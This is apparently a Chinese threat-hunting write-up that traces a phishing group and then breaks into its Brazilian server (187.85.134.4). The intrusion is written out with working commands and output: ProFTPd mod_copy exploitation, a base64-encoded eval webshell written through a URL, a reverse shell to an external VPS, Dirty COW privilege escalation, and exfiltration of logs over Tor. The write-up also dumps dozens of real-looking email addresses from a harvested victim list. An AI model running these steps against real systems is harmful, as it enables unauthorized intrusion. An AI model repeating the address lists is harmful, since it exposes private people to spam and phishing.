IP: 198.143.51.17 來自: 以色列 Incapsula
IP: 198.143.38.3 來自: 美國 Incapsula
IP: 198.143.41.14 來自: 美國 Incapsula
IP: 198.143.32.13 來自: 美國 Incapsula
IP: 198.143.32.3 來自: 美國 Incapsula
IP: 198.143.57.3 來自: 美國 Incapsula
IP: 198.143.57.73 來自: 美國 Incapsula
IP: 198.143.57.5 來自: 美國 Incapsula
IP: 198.143.32.10 來自: 美國 Incapsula
......
這個網站由於日誌不全提取出的IP大都是爬蟲IP所以不納入最終的彙總。
4.5.3 發現釣魚程式
網站 zebramedia.al 上發現多個攻擊者放置的釣魚程式和模板。
針對Dropbox
針對Gmail
4.6 關聯分析
使用之前得到的後門檔案中的關鍵字config.php
對這3個網站檔案進行匹配發現其中2個存在相同後門檔案並且檔案MD5值相同。
root@kali /tmp find . -name "*.php" |xargs grep "$bm_____s" |awk -F ":" `{print $1}`
./rosturplast.com/www/rosturplast.com/shells/config.php
./mirohaviar.sk/www/config.php
./zebramedia.al/www/zebramedia.al/config.php
./www.radiolanalhue.cl/www/public_html/online/administrator/templates/bluestork/config.php
後門檔案MD5
root@kali /tmp find . -name "*.php" |xargs grep "$bm_____s" |awk -F ":" `{print $1}`|xargs md5sum
e5c06f1f66781ba5c39d909096c4cd47./rosturplast.com/www/rosturplast.com/shells/config.php
e5c06f1f66781ba5c39d909096c4cd47 ./mirohaviar.sk/www/config.php
e5c06f1f66781ba5c39d909096c4cd47 ./zebramedia.al/www/zebramedia.al/config.php
e5c06f1f66781ba5c39d909096c4cd47./www.radiolanalhue.cl/www/public_html/online/administrator/templates/bluestork/config.php
五、滲透攻擊者肉雞伺服器
5.1 漏洞掃描
目標187.85.134.4
[+] HOST: 187.85.134.4巴西
[+] OS: Ubuntu
[+] Web Server: Apache/2.2.22 / PHP/5.3.10-1ubuntu3.19
[+] CMS: 未知
nmap --script=firewalk --traceroute 187.85.134.4
5. 漏洞利用
埠掃描發現目標 FTP Server為ProFTPd 1.3.4a
這個版本和1.3.5
存在未授權檔案複製漏洞我們可以通過這個漏洞往Web目錄寫入一個WebShell。
ProFTPd 1.3.5 Remote Command ExecutionCVE-2015-3306
ProFTPD中使用的mod_copy模組存在未授權訪問風險導致ProFTPD自帶的命令 SITE CPFR 和 SITE CPTO可在未登入ftp的情況被外部黑客所利用對系統檔案進行任意複製。
5. 獲取許可權
使用用MSF執行
得到一個cmd功能的WebShell
寫入中國菜刀客戶端
http://187.85.134.4/lndex.php?img=echo PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+Cg== |base64 -d >/var/www/index2.php
5.3 檔案分析
在Web目錄下面發現用於傳送釣魚郵件的perl指令碼、郵件釣魚樣本和大量的郵箱地址。以及挖礦後門、DDOS指令碼等。
5.3.1 釣魚模板
圖示是針對丹麥丹斯克銀行Danske Bank和希臘阿爾法銀行Alpha Bank的郵件釣魚樣本。
5.3.2 殭屍網路程式
5.3.3 DDOS指令碼
5.3.4 郵箱地址
統計目錄下的 txt 文字數量發現共有六十二萬四千個郵箱地址。
root@kali /tmp/187.85.134.4/www/cacat wc -l *.txt
624000 總用量
主流郵箱檢索
root@kali /tmp/187.85.134.4/www/cacat grep "@gmail.com" *.txt |head -n 20
a0000001.txt:a.l.v.e.rtadsmileyksso@gmail.com
a0000001.txt:a.l.v.ertadsmileyksso@gmail.com
a0000001.txt:a.lfer.gm@gmail.com
a0000001.txt:a.lieseijsink@gmail.com
a0000001.txt:a.linkhusen@gmail.com
a0000001.txt:a.loldrup@gmail.com
a0000001.txt:a.lovendahl@gmail.com
a0000001.txt:a.lv.e.rtadsmileyksso@gmail.com
a0000001.txt:a.lver.tadsmileyksso@gmail.com
a0000001.txt:a.m.edsberg@gmail.com
a0000001.txt:a.m.morcke@gmail.com
a0000001.txt:a.m.quist@gmail.com
a0000001.txt:a.m.svendsen@gmail.com
a0000001.txt:a.merete.p@gmail.com
a0000001.txt:a.mette.sm@gmail.com
a0000001.txt:a.miller8111@gmail.com
a0000001.txt:a.moejbaek@gmail.com
a0000001.txt:a.moltkehansen@gmail.com
a0000001.txt:a.munktved@gmail.com
a0000001.txt:a.n.knutzen@gmail.com
root@kali /tmp/187.85.134.4/www/cacat grep "@outlook.com" *.txt |head -n 20
a0000001.txt:a.m.westra@outlook.com
a0000001.txt:a.olsen@outlook.com
a0000002.txt:aagren@outlook.com
a0000003.txt:aandanimalcity@outlook.com
a0000003.txt:aarhus-ungegruppe@outlook.com
a0000004.txt:aase.lousdal@outlook.com
a0000006.txt:abroschultz@outlook.com
a0000008.txt:adamfred2@outlook.com
a0000008.txt:adexecsolution@outlook.com
a0000010.txt:adrian.f.a.svendsen@outlook.com
a0000015.txt:aiah@outlook.com
a0000015.txt:aimeegarcia584@outlook.com
a0000016.txt:ajolicoeu@outlook.com
a0000018.txt:akstrup@outlook.com
a0000020.txt:alexander_bangsborg@outlook.com
a0000020.txt:alexanderkopke@outlook.com
a0000020.txt:ali__sivan@outlook.com
a0000021.txt:alicegerner@outlook.com
a0000022.txt:allanjeppesen@outlook.com
a0000023.txt:allworlduseu@outlook.com
root@kali /tmp/187.85.134.4/www/cacat grep "@163.com" *.txt |head -n 20
a0000001.txt:a31a18615@163.com
a0000001.txt:a398c671@163.com
a0000059.txt:backlink0321@163.com
a0000061.txt:banqianm8256@163.com
a0000075.txt:bf86ad32@163.com
a0000121.txt:cbb146672@163.com
a0000129.txt:chenbin800519@163.com
a0000134.txt:chuofuh3082@163.com
a0000157.txt:davidhuang001@163.com
a0000162.txt:dfjiuew@163.com
a0000209.txt:f08dbf326@163.com
a0000213.txt:fanxued79193@163.com
a0000221.txt:fjfzpy@163.com
a0000227.txt:fon@163.com
a0000259.txt:guangdk@163.com
a0000311.txt:huhuanqiang00161@163.com
5.4 提權
5.4.1 CVE-2013-2094CVE-2013-1763提權
檢視apache日誌目錄發現沒有許可權。
[/var/www/]$ls -al /var/log/apache2/
ls: cannot open directory /var/log/apache2/: Permission denied
核心版本為3.5.0-23
嘗試提權。
[/var/www/]$cat /etc/issue
Ubuntu 12.04.2 LTS
l[/var/www/]$uname -an
Linux medidor2 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 GNU/Linux
WebShell反彈
[/var/www/]$cd /var/tmp;./pty xxx.xxx.xxx.xxx 443
外網VPS監聽
socat file:`tty`,echo=0,raw tcp-listen:443
實際測試CVE-2013-2094CVE-2013-1763
均無法提權。
CVE-2013-2094
Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu
12.04/12.04.1/12.04.2 x64) - `perf_swevent_init` Local Privilege Escalation (3)
CVE-2013-1763
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - `SOCK_DIAG` SMEP Bypass Local PrivilegeEscalation
5.4.2 髒牛提權
祭出大殺器CVE-2016-5195髒牛 理論上通殺 2.6.22 < 3.9 (x86/x64)的核心版本。
在本地環境提權測試過程中發現i386架構下使用cowroot提權時EXP會破壞原始檔導致提權失敗。而使用dirtycow-mem僅修改記憶體則沒有問題但是存在核心崩潰的風險。這兩個EXP都是利用/proc/self/mem提權前一個修改檔案後一個修改記憶體。
如圖所示
使用dirtycow-mem.c提權時需要注意i386架構下編譯前需要將原始碼中libc路徑修改為目標系統libc路徑否則執行時找不到檔案。
#define SHELLCODE "x31xc0xc3"
#define SPACE_SIZE 256
#define LIBC_PATH "/lib/x86_64-linux-gnu/libc.so.6" ## 改為 /lib/i386-linux-gnu/libc.so.6
#define LOOP 0x1000000
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
Give me root :提權成功。
www-data@medidor2:/tmp$gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread
www-data@medidor2:/tmp$ ls
hello
www-data@medidor2:/tmp$ chmod +x hello
www-data@medidor2:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@medidor2:/tmp$ ./hello
[*] range: b7573000-b7716000]
[*] getuid = b762bd10
[*] mmap 0xb73cb000
[*] exploiting (patch)
[*] patched (madviseThread)
[*] patched (procselfmemThread)
root@medidor2:/tmp# [*] exploiting (unpatch)
[*] unpatched: uid=33 (madviseThread)
[*] unpatched: uid=33 (procselfmemThread)
root@medidor2:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
打包Apache日誌。
root@kali ls /var/log/apache2
access error other_vhosts_access.log
root@kali tar zcvf /var/www/apache2-log.tar.gz /var/log/apache2/
root@kali /tmp ltor wget http://187.85.134.4/apache2-log.tar.gz
[proxychains] config file found: /data/app/local/proxychains_local_tor/proxychains.conf
[proxychains] preloading /data/app/local/proxychains_local_tor/libproxychains4.so
[proxychains] DLL init
--2019-01-09 22:09:00-- http://187.85.134.4/apache2-log.tar.gz
正在連線 187.85.134.4:80... [proxychains] Strict chain ... 127.0.0.1:9050 ...187.85.134.4:80 ... OK
已連線。
已發出 HTTP 請求正在等待回應... 200 OK
長度9258688 (8.8M) [application/x-gzip]
正在儲存至: “apache2-log.tar.gz”
apache2-log.tar.gz 100%[===================>] 8.83M 29.6KB/s 用時 5m 45s
201-11-11 11:11:11 (26.2 KB/s) - 已儲存 “apache2-log.tar.gz” [9258688/9258688])
5.5 分析日誌
分析IP訪問情況
root@kali /tmp/ grep "/cacat/" * |grep "php" | awk -F ":" `{print $2}` |awk`{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}` |sort -t " " -k 1 -n -r >ip.txt
95 185.56.80.138
77 197.211.60.52
70 67.71.3.8
59 207.35.210.35
41 99.226.207.46
41 193.215.40.238
39 197.211.59.163
38 82.61.95.132
38 66.249.73.95
37 76.26.34.181
37 197.234.221.77
31 105.112.27.60
29 105.112.23.41
20 109.166.138.68
16 66.249.79.61
16 197.211.61.18
14 212.100.77.191
12 197.234.221.210
8 66.249.79.35
8 66.249.73.64
7 154.118.69.165
5 66.249.73.67
......
root@kali /tmp for line in $(<ip.txt); do curl https://ip.cn/?ip=$line ; done
IP: 185.56.80.138 來自: 荷蘭
IP: 197.211.60.52 來自: 奈及利亞
IP: 67.71.3.8 來自: 加拿大
IP: 207.35.210.35 來自: 加拿大
IP: 99.226.207.46 來自: 加拿大
IP: 193.215.40.238 來自: 挪威
IP: 197.211.59.163 來自: 奈及利亞
IP: 82.61.95.132 來自: 義大利
IP: 66.249.73.95 來自: Google 骨幹網
IP: 76.26.34.181 來自: 美國
IP: 197.234.221.77 來自: 貝南
IP: 105.112.27.60 來自: 奈及利亞
IP: 105.112.23.41 來自: 奈及利亞
IP: 109.166.138.68 來自: 羅馬尼亞
IP: 66.249.79.61 來自: Google 骨幹網
IP: 197.211.61.18 來自: 奈及利亞
IP: 212.100.77.191 來自: 奈及利亞
IP: 197.234.221.210 來自: 貝南
IP: 66.249.79.35 來自: Google 骨幹網
IP: 66.249.73.64 來自: Google 骨幹網
IP: 154.118.69.165 來自: 奈及利亞
IP: 66.249.73.67 來自: Google 骨幹網
......
根據路徑名判斷疑似受害者訪問了釣魚頁面。
root@kali /tmp/ grep "/cacat" *| grep "php" |grep "POST" |awk -F ":" `{print $2 $6}`|sort |uniq
109.166.138.68 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
109.166.138.68 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php?sfm_sid=120" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
185.56.80.138 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php?sfm_sid=8425" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
196.52.34.20 - - [12/Oct/201835.0) Gecko/20100101 Firefox/35.0"
207.35.210.35 - - [21/Aug/2018//187.85.134.4/cacat/win2018/winbnk/EBlogin.html?sitecode=GR&lang=el-GR" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
197.211.60.52 - - [07/Sep/2018:16:02:40 -0300] "GET /cacat/nnnnn.zip HTTP/1.1" 2004489167 "http://187.85.134.4/cacat/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
檢視web目錄下txt檔案訪問情況總共有一萬多IP。訪問地址包含受害者主機IP、各種搜尋引擎爬蟲IP、各路黑客的IP等等。
grep "/cacat/" * |grep "txt" | awk -F ":" `{print $2}` |awk `{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}` |sort -t " " -k 1 -n -r >ip.txt
root@kali ~/Desktop wc -l ip.txt
10101 ip.txt
5.6 訪問IP熱力圖
5.6.1 IP轉經緯度座標
將獲得的IP轉換成經緯度座標再通過百度地圖API生成熱力圖
將IP轉換成經緯度座標指令碼
ip2xy.py
生成經緯度座標檔案point.js
全球IP庫GeoLiteCity.dat
#!/usr/bin/python
#coding:utf-8
import pandas as pd
import pygeoip
import types
import sys
gi = pygeoip.GeoIP(`/tmp/GeoLiteCity.dat`, pygeoip.MEMORY_CACHE)
def getLocal(ip):
if type(ip) != types.StringType:
print ip
return
location = gi.record_by_addr(ip)
if location is None:
print ip
return
lng = location[`longitude`]
lat = location[`latitude`]
str_temp = `{"lat":` + str(lat) + `,"lng":` + str(lng) + `},
`print ip,lng,lat,str_temp
file.write(str_temp)
file = open(`/tmp/point.js`, `w`)
file.write("var points =[
")with open("/tmp/ip.txt") as f:
i = 0
for ip in f.readlines():
getLocal(ip)
file.write("];
")file.close()
5.6.2 呼叫百度地圖API
本地呼叫百度地圖 JavaScript API map.html
<!DOCTYPE html>
<html lang="en">
<head>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="initial-scale=1.0, user-scalable=no" />
<script type="text/javascript" src="http://api.map.baidu.com/api?v=2.0&ak=填寫自己的百度AK"></script>
<script type="text/javascript"src="http://api.map.baidu.com/library/Heatmap/2.0/src/Heatmap_min.js"></script>
<script type="text/javascript" src="./point.js"></script>
<title>熱力圖功能示例</title>
<style type="text/css">
ul,li{list-style: none;margin:0;padding:0;float:left;}
html{height:100%}
body{height:100%;margin:0px;padding:0px;font-family:"微軟雅黑";}
#container{height:100%;width:100%;}
#r-result{width:100%;}
</style>
</head>
<body>
<div id="container"></div>
<div id="r-result" style="display:none">
<input type="button" onclick="openHeatmap();" value="顯示熱力圖"/><input type="button"onclick="closeHeatmap();" value="關閉熱力圖"/>
</div>
</body>
</html>
<script type="text/javascript">
var map = new BMap.Map("container"); // 建立地圖例項
var point = new BMap.Point(34.0224714118,109.0786868715);
map.centerAndZoom(point, 6); // 初始化地圖設定中心點座標和地圖級別
map.setCurrentCity("西安"); //設定當前顯示城市
map.enableScrollWheelZoom(); // 允許滾輪縮放
if(!isSupportCanvas()){
alert(`熱力圖目前只支援有canvas支援的瀏覽器,您所使用的瀏覽器不能使用熱力圖功能~`)
}
//詳細的引數,可以檢視heatmap.js的文件https://github.com/pa7/heatmap.js/blob/master/README.md
//引數說明如下:
/* visible 熱力圖是否顯示,預設為true
* opacity 熱力的透明度,1-100
* radius 勢力圖的每個點的半徑大小
* gradient {JSON} 熱力圖的漸變區間 . gradient如下所示
* {
.2:`rgb(0, 255, 255)`,
.5:`rgb(0, 110, 255)`,
.8:`rgb(100, 0, 255)`
}
其中 key 表示插值的位置, 0~1.
value 為顏色值.
*/
heatmapOverlay = new BMapLib.HeatmapOverlay({"radius":100,"visible":true});
map.addOverlay(heatmapOverlay);
heatmapOverlay.setDataSet({data:points,max:100});
//closeHeatmap();
//判斷瀏覽區是否支援canvas
function isSupportCanvas(){
var elem = document.createElement(`canvas`);
return !!(elem.getContext && elem.getContext(`2d`));
}
function setGradient(){
/*格式如下所示:
{
0:`rgb(102, 255, 0)`,
.5:`rgb(255, 170, 0)`,
1:`rgb(255, 0, 0)`
}*/
var gradient = {};
var colors = document.querySelectorAll("input[type=`color`]");
colors = [].slice.call(colors,0);
colors.forEach(function(ele){
gradient[ele.getAttribute("data-key")] = ele.value;
});
heatmapOverlay.setOptions({"gradient":gradient});
}
function openHeatmap(){
heatmapOverlay.show();
}
function closeHeatmap(){
heatmapOverlay.hide();
}
</script>
</body>
</html>
5.6.3 生成熱力圖
如圖所示歐洲IP居多亞洲也不少。至於有多少主機淪陷和多少受害者上鉤無法準確判斷。
六、資訊彙總
根據所得資訊彙總對這個黑客組織資訊進行簡單分析僅供參考。
6.1 組織資訊
名稱
Muslim Cyber Corp – Mujahidin Cyber Army – Family Attack Cyber
地區
巴勒斯坦
成員ID
Hawk_B404 、 MR.S1NS_Y 、 koneksi eror 、 GU3LT03M 、 SinonX 、
./B4Z1R007 、 ./Bl4ckJ4ck 、 anon99husein 、 4GottenName 、Gantai 、 4nzeL4
、 AKEMI403
歷史郵箱
alexsin54@yahoo.com
jasonchowan223@gmail.com
macacperus@yopmail.com
bidibidibidi@yopmail.com
bidi.pici11@hotmail.com
bidi.cuc@mail.com
flrnvasilica@gmail.com
組織主頁
http://mujahidincyberarmy.blogspot.com/
https://www.facebook.com/FamilyAttackCyberOfficial/
6.2 攻擊手段
入侵使用Wordpress、Joomla! CMS的網站、放置釣魚程式批量傳播釣魚郵件。
攻擊目標
早期政治目的居多主要攻擊美國政府機構網站和僱員。近期多為商業目的主要針對歐洲銀行客戶以及亞洲金融機構僱員進行郵件釣魚。
控制主機
187.85.134.4
常用後門
略
6.3 攻擊歷史
美國聯邦調查局、美國國土安全部、美國司法部
巴勒斯坦黑客已經發布了大約2萬名聯邦調查局FBI和9,000名國土安全部DHS官員的個人資訊
http://mujahidincyberarmy.blogspot.com/2016/12/inilah-data-informasi-pribadi-20-ribu.html通過釣魚郵件獲得美國司法部許可權
http://mujahidincyberarmy.blogspot.com/2016/02/hacker-pro-palestina-terbitkan.html
6.4 代理IP
174.85.145.99 (美國) - - [27/Nov/2018:23:35:31 +0300] "POST /shells/bacu.php HTTP/1.1"200 4731 "http://www.rosturplast.com/shells/bacu.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
50.73.252.169 (美國) - - [29/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
213.233.104.120 (羅馬尼亞) - - [27/Nov/2018:22:10:03 +0300] "GET /shells/config.php HTTP/1.1" 200 124 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
207.228.149.69 (百慕大 ) - - [28/Nov/2018:23:12:54 +0300] "POST /shells/config.php HTTP/1.1" 200 3729 "http://www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
195.211.23.207 (俄羅斯) - - [27/Nov/2018:22:36:50 +0300] "GET /shells/config.php HTTP/1.1" 200 124 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
29.205.113.8 (奈及利亞) - - [30/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
212.1.211.3 美國 - - [30/Nov/2018:13:35:36 -0300] "GET /online/templates/beez5/bc.php HTTP/1.1" 200 16823 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
178.128.221.199 希臘- - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
197.211.61.82 奈及利亞) - - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
6.5 被黑網站
不完全統計
rosturplast.com
mirohaviar.sk
helioncomposites.com
radiolanalhue.cl
zebramedia.al
www.qtfontebispo.com
www.seoeaze.com
vilapoucadeaguiar.com
proyectosphr.cl
u-p.com
www.humanaconsultores.cl
amsogroup.com
www.tdftechnologies.com
www.bvvagos.pt
www.huellasdigitales.cl
lince.apsl.edu.pl
www.fica.unsl.edu.ar
proyectosphr.cl
www.zlobek.uw.edu.pl
ifr.pt
mail.ijrer.org
www.hkmms.org.hk
historia.apsl.edu.pl
www.homeguide.com.sg
onlinecombos.co.in
umo.apsl.edu.pl
www.bpmp2t.lombokbaratkab.go.id
amsogroup.com
viper.cl
www.teniscavancha.cl
www.estacaomedica.pt
terrarestobar.cl
jf-bragado.pt
helioncomposites.com
notariabasualto.cl
ericdiblasi.com
reinamarltda.cl
cobraz.pt
www.stmarypellaia.com
webcam.wm-itservice.at
七、攻擊路徑還原
覆盤整個溯源過程還原攻擊者攻擊路徑。
本文作者:信陵君魏無忌 發表於freebuf 小白的我 www.wanqiandu.com
相關文章
- 釣魚篇-郵件釣魚
- Coremail郵件安全:2022重保最新釣魚案件典型攻擊手法覆盤REMAI
- 網路釣魚攻擊
- 釣魚攻擊防不勝防,該如何預防網路釣魚攻擊?
- 辦公護甲:十大預防電子郵件釣魚攻擊的方法
- 釣魚攻擊時間軸,你知道常見的釣魚攻擊有哪些嗎
- 攻防總結:某大型攻防演練中紅隊釣魚郵件攻擊手法覆盤
- 關於釣魚郵件,你知道多少?
- 伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊黑客
- 【釣魚攻擊】外貿白領:比“貿易戰”更頭疼的釣魚攻擊來襲!
- Darktrace:報告稱ChatGPT等生成式AI導致網路釣魚郵件攻擊增長135%ChatGPTAI
- 最新釣魚郵件曝光:偽裝成Office 365未送達郵件
- 網路釣魚是什麼?網路釣魚攻擊的形式有哪些?
- GoogleTalk被黑客利用發動釣魚攻擊Go黑客
- 這樣的釣魚郵件,你會中招嗎?
- 美團被爆用釣魚郵件獲拼多多薪資資訊,電商企業如何防範釣魚郵件?
- 2021 年Q2Coremail郵件安全報告發布:超8成釣魚郵件來自境外攻擊REMAI
- X站釣魚郵件應急響應案例分析
- 2021年Q2郵件安全報告:釣魚郵件季環比增長21.27%
- 網路釣魚攻擊常用方法及防禦措施!
- 這幾種釣魚郵件,你一定不陌生~
- 釣魚郵件真假難辨?幾招教你如何辨別
- 為什麼釣魚郵件備受駭客青睞
- “竊密寄生蟲”木馬偽裝成商務郵件釣魚 數千家外貿企業遭攻擊
- 《2021年度高階威脅研究報告》 | APT攻擊防範要當心“定製化的釣魚郵件”APT
- 常見網路釣魚攻擊有哪些?如何識別?
- 網路釣魚攻擊常見手段及防範措施!
- 基於釣魚郵件測試的安全意識教育方法
- 網路釣魚攻擊常用方法是什麼?如何防護?
- 揭秘駭客新招:如何利用PDF釣魚攻擊使用者?
- 關注重要的Azure網路釣魚攻擊及對策
- DNS欺騙:網站克隆實現網站釣魚攻擊DNS網站
- 掌握這些方法,輕鬆識破釣魚郵件的偽裝
- 2022Q1Coremail企業郵箱安全報告:平均每天67萬封釣魚郵件被收發!釣魚詐騙涉案千萬REMAI
- 釣魚郵件翻倍!2021年Q4企業郵箱安全報告出爐!
- 釣魚釣魚去
- 多部門下發補貼?假的!Coremail郵件安全提醒:詐騙型釣魚郵件正在活躍!REMAI
- AgentTesla病毒解析:利用釣魚郵件竊取終端隱私資料